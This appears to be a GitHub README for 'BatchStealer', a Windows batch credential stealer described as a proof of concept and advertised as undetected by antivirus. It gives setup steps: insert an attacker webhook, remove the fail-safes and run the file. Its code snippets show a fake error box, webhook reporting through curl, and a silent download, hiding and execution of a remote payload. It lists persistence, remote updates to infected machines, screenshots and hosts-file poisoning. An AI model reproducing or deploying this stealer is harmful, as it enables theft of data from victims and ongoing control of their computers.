My attempt at making a stealer with batch, it sucks. The script will not be updated anymore. If something, a new one would be made, this time properly. Treat the current BatchStealer as POC, not as a finished product/malware.

3.4.2021 < FUD (Virustotal)

1. Change the webhook to yours.
2. Remove the fail-safes. ("goto xxx")
3. Run the batch file.

• Do a regex search on notepad++, match ^::.*\n and replace with nothing.

• Just changing the webhook and doing nothing else.
  • If the batch file does nothing the user will open it to see what's wrong.

Almost everything is encrypted, I haven't had the patience to do that on a batch file

Skip run by Task Scheduler

if not "%~dp0"=="%vpath%\" (
:: Your code not to get recurred
)

Fake error message

set "vpath="
...

:: FAKE ERROR MESSAGE | REMOVE GOTO IF YOU WANT IT TO DISPLAY
:: ----------------------------------------------------------
goto skipfakeerror
if not "%~dp0"=="%vpath%\" (
start /min /b mshta vbscript:Execute("Msgbox(""Bodytext""+vbCrLf+vbCrLf+""Anotherbody""),16,""Titletext"":window.close")
)
:skipfakeerror

...

Download & run payload

set "vpath="
set "webhook="

cd %vpath%
...

:: PAYLOAD - REMOVE GOTO IF YOU WANT THE SCRIPT TO DOWNLOAD AND RUN A FILE SOMEWHERE
:: ---------------------------------------------------------------------------------
goto skipcustomdownload
	set "customdownloadurl=https://external.ext/file.exe"
        set "customfilename=c.exe"
	curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Downloading and starting a custom file from\n%customdownloadurl% to %vpath%\%customfilename%```\"}" %webhook%
	IF EXIST "%customfilename%" GOTO waitloop4
	curl --silent -L --fail "%customdownloadurl%" -o "%customfilename%"
	>NUL attrib "%vpath%\%customfilename%" +h
	:waitloop4
	IF EXIST "%customfilename%" GOTO waitloopend4
	timeout /t 5 /nobreak > NUL
	:waitloopend4
	2> NUL start "%customfilename%"
:skipcustomdownload

...

• Delete itself after execution

• Add itself to Task Scheduler (CMD window will be invisible when executed)

  • Will make files to C:\ProgramData by default. (Hidden)

• Push updates to infected machine(s) (Beta, expect bugs and crashes)

  • Make sure to have a working batch file's source on the link, it will replace everything.
  • Ability to target specific users (Check username)

• Take screenshot

• Add garbage code (Confuse/Fill)

• Obfuscate Not made yet.

• DNS poisoning
  • Simple edit of the hosts file (Would require administrator)
• Other interesting stuff...

• If you want to support the project do a pull request.
  • The pull request could be a new steal etc.

• You can try this
  • Recurring does not work with the obfuscation. (Script exits when it reaches it)
  • "Start as administrator" will make a visible error message on the CMD box.

• Screenshot-cmd (github)

None of the authors, contributors, or anyone else connected with this open source project, in any way whatsoever, can be responsible for your use of the information or the application contained in or linked from this repository.

Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.

If you don't agree with any of our disclaimers above, do not read the code or download anything from our repository as you have no permission to read and explore our repository until you agree.